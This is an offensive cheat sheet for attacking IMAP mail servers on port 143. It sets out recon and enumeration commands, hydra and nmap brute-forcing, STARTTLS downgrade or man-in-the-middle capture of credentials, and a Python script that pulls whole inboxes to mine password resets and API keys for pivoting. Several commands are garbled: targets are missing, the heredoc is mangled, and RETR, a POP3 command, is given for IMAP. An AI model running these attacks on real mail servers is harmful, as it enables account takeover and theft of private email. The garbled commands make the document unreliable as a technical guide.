143 — IMAP (Internet Message Access Protocol)

0) What is IMAP?

IMAP (Internet Message Access Protocol) is a protocol for accessing and managing email on a remote server while keeping messages on the server. It normally listens on TCP port 143 (plaintext + STARTTLS) and on 993 for IMAPS (TLS). IMAP allows clients to list mailboxes, fetch message headers/bodies, and manipulate flags—making it a high-value target if authentication or transport security is weak.

1) Recon Phase

- Service discovery & banner: nmap -sV -p 143 [target]
- Check STARTTLS/IMAPS support: nmap -p 143 --script ssl-enum-ciphers,imap-capabilities [target]
- Check IMAP on 993 (IMAPS): nmap -sV -p 993 [target]
- Passive recon: lookup MX records (dig MX ) to find mail hosts

Record server software (Dovecot, Courier, Microsoft Exchange), supported AUTH mechanisms, and whether TLS (STARTTLS/IMAPS) is enforced.

2) Enumeration Phase

- Banner & CAPABILITY: use openssl / nc to connect and read server greeting and CAPABILITY list
    openssl s_client -starttls imap -connect :143 -crlf
- List mailboxes and capabilities (manual IMAP commands):
    A001 CAPABILITY
    A002 LIST "" "*"
- Check AUTH mechanisms (PLAIN, LOGIN, CRAM-MD5, DIGEST-MD5, NTLM, GSSAPI)
- Automated enumeration:
    nmap --script=imap-capabilities,imap-brute -p 143 
- Username discovery: use timing/response differences with valid/invalid attempts or use mailbox naming conventions discovered via MX/OSINT

Look for servers that allow plaintext authentication (AUTH PLAIN/LOGIN over unencrypted channel) or accept weak mechanisms. Note support for SASL/NTLM/GSSAPI which affects brute-force strategies.

3) Exploitation Phase

- Credential harvesting (authorized only): use valid creds to LIST/RETR mailboxes and download messages (RETR)
- Brute force / credential stuffing (authorized only):
    hydra -L users.txt -P passwords.txt imap://
- Exploit STARTTLS downgrade or MITM in untrusted networks to capture plaintext auth (authorized lab use)
- If private keys or reset emails exist in mailboxes, use them to pivot to other services
- Use Python's imaplib for scripted retrieval once credentials obtained

Focus on acquiring mailbox contents that contain secrets (password resets, API keys), and on finding credentials that work for other services. Respect legal/ethical boundaries—do not access mailboxes without permission.

IMAP Info — What to Look For

Plaintext authentication allowed on port 143 without STARTTLS
Weak AUTH mechanisms (AUTH LOGIN/PLAIN) exposed over non-TLS
IMAPS (993) missing or misconfigured (no enforced TLS)
Mailboxes containing password resets, tokens, or sensitive attachments
Support for CRAM-MD5/NTLM/GSSAPI which may require different tooling

Tools Required

sudo apt install nmap openssl netcat hydra python3
# Useful Python tooling: imaplib (stdlib), imapclient
# Nmap NSE scripts: imap-capabilities, imap-brute

Quick copy-paste command cheatsheet

# discovery & capabilities
nmap -sV -p 143 --script=imap-capabilities,imap-brute 
nmap -sV -p 993    # IMAPS

# check STARTTLS & banner
openssl s_client -starttls imap -connect :143 -crlf

# manual IMAP session (example)
# connect with nc and issue IMAP commands
nc  143
A001 CAPABILITY
A002 LIST "" "*"

# brute-force (authorized only)
hydra -L users.txt -P passwords.txt imap://

# Python quick retrieval (example - authorized only)
python3 - <')
M.login('username','password')
M.select('INBOX')
typ, data = M.search(None, 'ALL')
for num in data[0].split():
    typ, msg = M.fetch(num, '(RFC822)')
    print(msg[0][1][:200])  # preview
M.logout()
PY

Citations

Disclaimer: Use these techniques only on systems and mailboxes you own or are explicitly authorized to test. Accessing others' email or intercepting credentials without permission is illegal and unethical.